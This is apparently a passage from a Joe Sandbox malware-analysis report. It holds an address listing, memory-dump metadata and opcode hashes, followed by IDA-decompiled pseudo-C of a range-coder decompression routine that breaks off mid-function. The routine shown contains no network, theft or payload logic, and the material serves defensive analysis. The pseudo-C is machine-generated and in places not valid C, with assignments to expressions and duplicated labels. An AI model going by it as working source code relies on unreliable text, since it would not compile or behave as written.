                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                              • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
